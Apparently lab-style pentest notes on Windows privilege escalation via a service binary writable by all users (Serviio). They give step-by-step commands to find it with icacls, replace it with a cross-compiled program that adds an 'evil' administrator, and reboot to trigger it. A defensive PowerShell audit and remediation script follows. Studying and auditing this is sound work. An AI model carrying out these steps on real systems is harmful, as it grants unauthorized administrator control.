Binary hijacking / Insecure File permissions
Another way to elevate privileges on a Windows system is to exploit insecure file permissions on the executables of services that run as NT AUTHORITY\SYSTEM.
Example:
Serviio service
- List the running services in PowerShell and look for any suspicious one
Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}
C:\Program Files\Serviio\bin\ServiioService.exe looks suspicious
- Check the permissions on the suspicious service binary with the icacls Windows utility in cmd
F = full access, M = modify access, RX = read and execute access, W = write-only access
icacls "C:\Program Files\Serviio\bin\ServiioService.exe"
The output contains BUILTIN\Users:(I)(F), which means every local user has (inherited) full access to the binary
- C code (adduser.c) that will create an evil user and add it to the local Administrators group
- Compile adduser.c on Linux with the mingw cross-compiler
i686-w64-mingw32-gcc adduser.c -o adduser.exe
- Replace the original ServiioService.exe binary with our malicious copy:
move "C:\Program Files\Serviio\bin\ServiioService.exe" "C:\Program Files\Serviio\bin\ServiioService_original.exe"
move adduser.exe "C:\Program Files\Serviio\bin\ServiioService.exe"
dir "C:\Program Files\Serviio\bin\"
- Restart the service
net stop Serviio
Most of the time the current user doesn't have permission to restart the service. The service may, however, be set to start automatically ("Auto") after a system reboot. To check:
wmic service where caption="Serviio" get name, caption, state, startmode
- Check whether the current user has permission to reboot
whoami /priv
Privilege Name         Description            State
=====================  =====================  ========
SeShutdownPrivilege    Shut down the system   Disabled
"Disabled" here only means the privilege is not currently enabled in the token; it is still held by the user, and shutdown.exe enables it itself before rebooting.
- Reboot
shutdown /r /t 0
- After the reboot, log in as "evil" with the password "Ev!lpass" and confirm that the evil user is in the local Administrators group
net localgroup Administrators
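As an added defensive check (this script is not part of the original notes), the following PowerShell audit enumerates running services and reports any whose executable grants write, modify or full control to low-privileged principals, i.e. the misconfiguration abused above. The list of weak groups, the path parsing and the remediation line are assumptions of this example.

```powershell
# Added audit script (not from the original notes): report running services whose
# executable is writable by low-privileged principals. The group list is an assumption.
$weakGroups  = @('BUILTIN\Users', 'Everyone', 'NT AUTHORITY\Authenticated Users')
$writeRights = [int][System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl'

function Get-ServiceBinaryPath {
    param([string]$PathName)
    # A service PathName may be quoted ("C:\x y\svc.exe" -arg) or unquoted (C:\x y\svc.exe -arg)
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^(.+?\.exe)') { return $Matches[1] }
    return $PathName
}

function Find-WritableServiceBinary {
    Get-CimInstance Win32_Service |
      Where-Object { $_.State -eq 'Running' -and $_.PathName } |
      ForEach-Object {
        $svc  = $_
        $path = Get-ServiceBinaryPath $svc.PathName
        if (-not (Test-Path -LiteralPath $path)) { return }
        foreach ($ace in (Get-Acl -LiteralPath $path).Access) {
            $isWeak   = $weakGroups -contains $ace.IdentityReference.Value
            $canWrite = (([int]$ace.FileSystemRights) -band $writeRights) -ne 0
            if ($ace.AccessControlType -eq 'Allow' -and $isWeak -and $canWrite) {
                [pscustomobject]@{
                    Service   = $svc.Name
                    RunsAs    = $svc.StartName      # e.g. LocalSystem
                    StartMode = $svc.StartMode      # Auto: a reboot restarts the service
                    Binary    = $path
                    Principal = $ace.IdentityReference.Value
                    Rights    = $ace.FileSystemRights
                    Inherited = $ace.IsInherited    # the (I) flag in icacls output
                }
            }
        }
      }
}

Find-WritableServiceBinary | Format-Table -AutoSize

# Remediation for a flagged binary (run as Administrator): drop inherited ACEs and grant
# write access only to SYSTEM and Administrators. The path below is a placeholder.
# icacls "C:\path\to\service.exe" /inheritance:r /grant:r "BUILTIN\Administrators:(F)" "NT AUTHORITY\SYSTEM:(F)" "BUILTIN\Users:(RX)"
```

Any row in the output where RunsAs is LocalSystem and StartMode is Auto matches the Serviio case exactly and should be fixed before an unprivileged user finds it.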